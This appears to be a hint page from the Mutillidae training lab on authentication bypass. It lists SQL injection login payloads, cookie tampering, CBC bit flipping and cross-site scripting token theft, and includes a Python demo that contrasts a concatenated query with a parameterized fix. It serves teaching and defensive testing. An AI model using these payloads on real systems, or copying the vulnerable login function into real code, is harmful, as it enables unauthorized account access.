Authentication Bypass


Overview

Authentication bypass is generally specific to each web application that has the vulnerability. However, there are some common abuse-case patterns.

Discovery Methodology

Attempt to discover whether SQL injection is present, since this vulnerability often allows authentication bypass.

If possible, acquire a standard user account and an administrator account from the client. Authenticate with both, carefully noting any differences in the session tokens, cookies, and/or hidden fields.

If the testing is black box, register multiple user accounts, carefully noting differences between the accounts after authentication.

Exploitation (SQL Injection)

Login

Use SQL Injection to bypass authentication on the login page. See the SQL Injection hints or the SQL injection tutorial for help on SQL injection.

This can be done using the name field to authenticate as the first user found in the user table.

Username: ' or 'a' = 'a' --
Password: whatever

To target a particular user, first identify the username. (Note: this site is vulnerable to username disclosure.) Complete the "username" portion of the query with the target username, then bypass the password portion of the query either by creating a tautology or by simply commenting out the password portion.

Bypass the password with a tautology:

Username: jeremy
Password: ' or ('a' = 'a' and username='jeremy') or '

Comment out the password portion of the query:

Username: jeremy' --
Password: whatever
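As an added example (not part of this hint page or Mutillidae's own code), the following Python script builds a small in-memory SQLite user table, implements the login check the way a vulnerable page does (string concatenation) beside the parameterized fix, and runs the three payloads above against both. The account rows, table name and function names are constructed for this illustration.

```python
import sqlite3

# Constructed sample accounts for this illustration, not the lab's real data.
# Plaintext passwords only keep the example short; real code stores salted hashes.
SAMPLE_ACCOUNTS = [("admin", "adminpass"), ("jeremy", "jeremysecret")]

# The three payloads from the hint text above, as (username, password) pairs.
PAYLOADS = [
    ("' or 'a' = 'a' -- ", "whatever"),
    ("jeremy", "' or ('a' = 'a' and username='jeremy') or '"),
    ("jeremy' -- ", "whatever"),
]

def make_db():
    """Create an in-memory SQLite user table holding the sample accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return con

def login_vulnerable(con, username, password):
    """Login check built by string concatenation: the input becomes part of the
    SQL grammar, so a quote plus OR or -- rewrites the WHERE clause.
    Returns the first matching username, or None."""
    query = ("SELECT username FROM accounts WHERE username='" + username
             + "' AND password='" + password + "'")
    try:
        row = con.execute(query).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL just fails to authenticate
    return row[0] if row else None

def login_fixed(con, username, password):
    """Same check with bound parameters: the input is passed as data and never
    parsed as SQL, so quotes, OR and comment markers are matched literally."""
    row = con.execute(
        "SELECT username FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

def run_payloads(con):
    """Return one (vulnerable_result, fixed_result) pair per payload."""
    return [(login_vulnerable(con, u, p), login_fixed(con, u, p)) for u, p in PAYLOADS]

if __name__ == "__main__":
    for (u, p), (vuln, fixed) in zip(PAYLOADS, run_payloads(make_db())):
        print(f"user={u!r:22} pass={p!r:48} vulnerable={vuln!r} fixed={fixed!r}")
```

Every payload logs in through the concatenated query and fails through the parameterized one, while a correct username and password still succeeds in both.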

Exploitation (Authentication Token Manipulation)

Alter the values of any authentication and/or authorization tokens found, such as those in cookies. This works on any page post-authentication. Register for an account to explore how the site uses cookies.

Gaining Access: Using insecure client-side authentication tokens

Page: Any page
Tool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)

Note what cookies the site sets by default
Create a test account
Log in using the test account
Check what cookies the site has after authentication
Differential analysis: change the value of the original auth cookie
Work backwards until the admin account is found

Exploitation (CBC bit flipping attack)

Try bit flipping, padding oracle, and CBC bit flipping attacks on authentication and/or authorization tokens.

View User Privileges

Exploitation (Authentication Token Hijack)

Use a cross-site scripting attack to trick a lab partner into visiting the data capture page while authenticated. Use Cookie Manager Plus to create or edit cookies in order to become that user.

Data Capture
View Captured Data

Exploitation (Browser Fingerprint Spoofing)

On captive portal systems, spoofing an unsupported browser may bypass some controls.

User-Agent Impersonation

Videos


How to Create Wordlists from Web Sites using CEWL
Brute Force Authentication using Burp-Intruder
SQL Injection Explained - Part 8: Authentication Bypass
Bypass Authentication via Authentication Token Manipulation
Using Hydra to Brute Force Web Forms Based Authentication
Analyze Session Token Randomness using Burp-Suite Sequencer
Using Ettercap and SSLstrip to Capture Credentials
Introduction to Password Cracking with John the Ripper